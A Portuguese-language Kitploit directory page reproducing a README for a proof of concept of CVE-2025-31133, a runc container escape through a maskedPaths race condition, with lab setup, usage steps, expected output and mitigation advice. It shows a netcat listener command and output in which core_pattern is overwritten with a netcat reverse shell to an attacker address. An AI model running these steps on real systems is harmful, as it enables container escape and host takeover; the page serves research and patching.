Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Learn-about-cve-2025-31133-poc — Prova de conceito educacional para CVE-2025-31133, uma fuga de contêiner runc via condição de corrida maskedPaths. Inclui configuração de laboratório, script de exploit e orientações de mitigação para pesquisadores de segurança. | Kitploit
Ferramentas/GitHubGitHub/c-h4ck-0/learn-about-cve-2025-31133-poc
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoAprendizado e EducaçãoEscape de ContêinerLabs e Prática
GitHubc-h4ck-0/learn-about-cve-2025-31133-poc

Learn-about-cve-2025-31133-poc

Prova de conceito educacional para CVE-2025-31133, uma fuga de contêiner runc via condição de corrida maskedPaths. Inclui configuração de laboratório, script de exploit e orientações de mitigação para pesquisadores de segurança.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
236há 5 mesesAinda não revisado

Aprenda-sobre-cve-2025-31133-poc

Visão Geral

Uma demonstração de prova de conceito e ambiente de aprendizado para CVE-2025-31133, uma vulnerabilidade de segurança no runc que permite contornar a proteção maskedPaths por meio de uma condição de corrida. maskedPaths são projetados para impedir que contêineres acessem caminhos sensíveis do sistema de arquivos do host.

https://github.com/user-attachments/assets/d7b4ea43-6cab-4ac5-bb07-08bc46479910

👉 Este repositório é um exemplo prático da mentalidade e técnicas de pesquisa exatas ensinadas no treinamento Black Hat:

Se você acha isso interessante, isso é apenas a ponta do iceberg.

Segurança Ofensiva de Contêineres: Uma Masterclass em Quebrar os Limites

📅 Datas de Treinamento Black Hat USA 2026:

1–2 de Agosto

https://blackhat.com/us-26/training/schedule/index.html#offensive-container-security-a-masterclass-in-breaking-the-boundaries-50910

3–4 de Agosto

https://blackhat.com/us-26/training/schedule/index.html#offensive-container-security-a-masterclass-in-breaking-the-boundaries-509101770251750

Detalhes da Vulnerabilidade

  • ID do CVE: CVE-2025-31133
  • Componente: runc (runtime de contêiner)
  • Vetor de Ataque: Condição de corrida no tratamento de maskedPaths
  • Impacto: Fuga do contêiner

Como Funciona

O exploit aproveita uma condição de corrida onde:

  1. Um contêiner é configurado com maskedPaths para proteger arquivos sensíveis (ex.: /proc/sys/kernel/core_pattern)
  2. Durante a inicialização do contêiner, ocorre uma condição de corrida entre:
    • A exclusão de um nó de dispositivo (/dev/null) no rootfs do contêiner
    • A recriação desse nó de dispositivo
  3. Essa janela de tempo permite que a proteção do caminho mascarado seja contornada
  4. Um atacante pode escrever em arquivos protegidos que deveriam estar mascarados

⚠️ Aviso Legal

Este repositório é apenas para fins educacionais.

  • Use apenas em ambientes isolados e controlados
  • Não use contra sistemas que você não possui ou não tem permissão explícita para testar
  • O autor não é responsável por qualquer uso indevido deste código
  • Este exploit pode causar instabilidade no sistema ou perda de dados

Pré-requisitos

  • Sistema Linux (Ubuntu recomendado)
  • Acesso root/sudo
  • Conexão com a internet
  • Compreensão básica de runtimes de contêineres e segurança

Configuração

1. Clone ou Baixe Este Repositório

root@kitploit:~
git clone https://github.com/C-h4ck-0/Learn-about-cve-2025-31133-poc.git
cd Learn-about-cve-2025-31133-poc

2. Execute o Script de Configuração do Laboratório

O script lab-setup.sh irá:

  • Instalar dependências
  • Configurar runc vulnerável v1.2.0
root@kitploit:~
chmod +x lab-setup.sh
./lab-setup.sh

3. Verifique a Configuração

Verifique se a versão vulnerável do runc está instalada:

root@kitploit:~
runc --version

Você deve ver a versão 1.2.0 ou similar.

Executando o Exploit

Uso Básico

  1. Inicie um listener na sua máquina atacante para receber o shell reverso:
root@kitploit:~
nc -lnvp <PORT>
  1. Execute o script do exploit:
root@kitploit:~
chmod +x cve-2025-31133-exploit.sh
./cve-2025-31133-exploit.sh
  1. Forneça as informações solicitadas quando solicitado:
    • Endereço IP do atacante
    • Porta do atacante (onde seu listener está executando)

Saída Esperada

Em caso de sucesso, você deve ver:

root@kitploit:~
[*] Compiling race condition exploit binary...
[*] Starting exploit attempts...
[*] Target: /proc/sys/kernel/core_pattern
[*] Backing up /proc/sys/kernel/core_pattern...
[*] Backup created at /tmp/core_pattern.bak
[*] Current content of target:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E

====================================================
[*] Testing delay: 5 microseconds
====================================================
X..
[+] ========================================
[+] SUCCESS! Exploit succeeded.
[+] ========================================
[+] Original content:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
------------------------------------------------
[+] Modified content:
|/bin/nc.traditional <ip-address> <port> -e /bin/bash
------------------------------------------------
./exploit.sh: line 148:  7068 Segmentation fault      (core dumped) sleep 5
[*] Restoring original content...
[*] Restoration complete.

Uma conexão de shell reverso deve ser estabelecida com seu listener.

Mitigação

Para se proteger contra esta vulnerabilidade:

  1. Atualize o runc para uma versão corrigida (v1.2.1 ou posterior)
  2. Mantenha os runtimes de contêineres atualizados regularmente
  3. Use princípios de menor privilégio - execute contêineres em um namespace de usuário não root

Referências

  • arquivo de lista de discussão
  • Repositório GitHub do PoC da vulnerabilidade

Notas

  • O exploit pode exigir múltiplas tentativas para ter sucesso devido à natureza da condição de corrida
  • A taxa de sucesso depende da carga do sistema e do tempo
  • O script restaura automaticamente o core_pattern original após uma exploração bem-sucedida
  • A limpeza é tratada automaticamente via handlers trap

Licença

Este projeto é fornecido para fins educacionais. Use com responsabilidade e ética.


Lembre-se: Sempre use ferramentas de pesquisa de segurança de forma responsável e apenas em ambientes que você possui ou tem permissão explícita para testar.

Baixar ferramenta